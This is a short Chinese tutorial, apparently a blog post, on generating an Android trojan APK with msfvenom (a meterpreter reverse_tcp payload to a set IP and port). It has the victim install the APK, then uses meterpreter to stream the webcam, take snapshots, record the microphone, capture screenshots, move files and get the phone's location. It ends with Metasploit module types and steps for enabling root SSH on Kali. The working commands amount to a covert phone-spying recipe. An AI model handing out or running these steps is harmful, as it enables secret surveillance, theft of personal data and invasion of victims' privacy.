1.使用msf的msfveno模块生成安卓apk木马并制定攻击方IP与端口 ,存在temph目录下
image.pngmsfvenom -p android/meterpreter/reverse_tcp lhost=192.168.17.190 lport=5555 R>/temph/a.apk
2.生成木马文件放到安卓端
image.png3.执行监听,执行 当客户端执行点击apk文件 ,OK 上钩了
image.png4.使用摄像头/录音
进行实时视频流
image.png
进行截屏
image.png
进行录音
image.png
等等一系列操作 列出如下指令:
record_mic 从默认麦克风录制音频 x 秒
record_mic 参数:
-h:显示帮助。
-d :记录的秒数,默认为 1 秒 (默认的 1 秒听不到啥,设置高了又会报错,在 Kali linux 测得 13 为最优秒数)
-F :wav 文件路径。默认为 HOME / [随机乱码名字] .wav
-p :自动播放捕获的音频,默认为“true”。
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_snap 参数:
-h:显示帮助
-i :要使用的网络摄像头的索引号。
-p :JPEG 图像文件路径。默认为 HOME / [随机乱码名字]
-q :JPEG 图像质量,默认为“50”。
-v :自动查看 JPEG 图像,默认为“true”
webcam_stream 从指定的网络摄像头播放视频流
4.文件上传下载
手机图片存的位置
image.png
5.图片文件搜索
image.png下载
meterpreter > download desktop.ini
上传
meterpreter > upload /root/Downloads/1.jpeg /storage/emulated/0/DCIM/Camera
5.获取位置
image.png渗透攻击(exploit) : 缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。
攻击载荷(payload):攻击载何是我们期望目标系统在被渗透攻击后而执行的代码
辅助模块 (auxiliary):主要包含渗透测试中一些辅助性的脚本,这些脚本功能有扫描,嗅探,破解,注入等
编码模块 (Encoders):各种编码工具 用于躲过入侵检测和过滤系统。
后续攻击模块 (Post) : 这个目录里放着msf 的exploits执行成功后,向目标机发送的一些功能性指令比如:提权,获取hash等。
kail Windows10 远程连接解决办法
第一步:开启kail 远程ssh,开启办法如下:
1、配置SSH参数
修改sshd_config文件,命令为:vi /etc/ssh/sshd_config
将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes
将PermitRootLogin without-password修改为PermitRootLogin yes
然后,保存,退出vi
第二步:启动SSH服务
命令为:
/etc/init.d/ssh start
或者
service ssh start
查看SSH服务状态是否正常运行,命令为:
/etc/init.d/ssh status
或者
service ssh status
第三步:设置系统自动启动SSH服务
update-rc.d ssh enable //系统自动启动SSH服务
update-rc.d ssh disabled // 关闭系统自动启动SSH服务
网友评论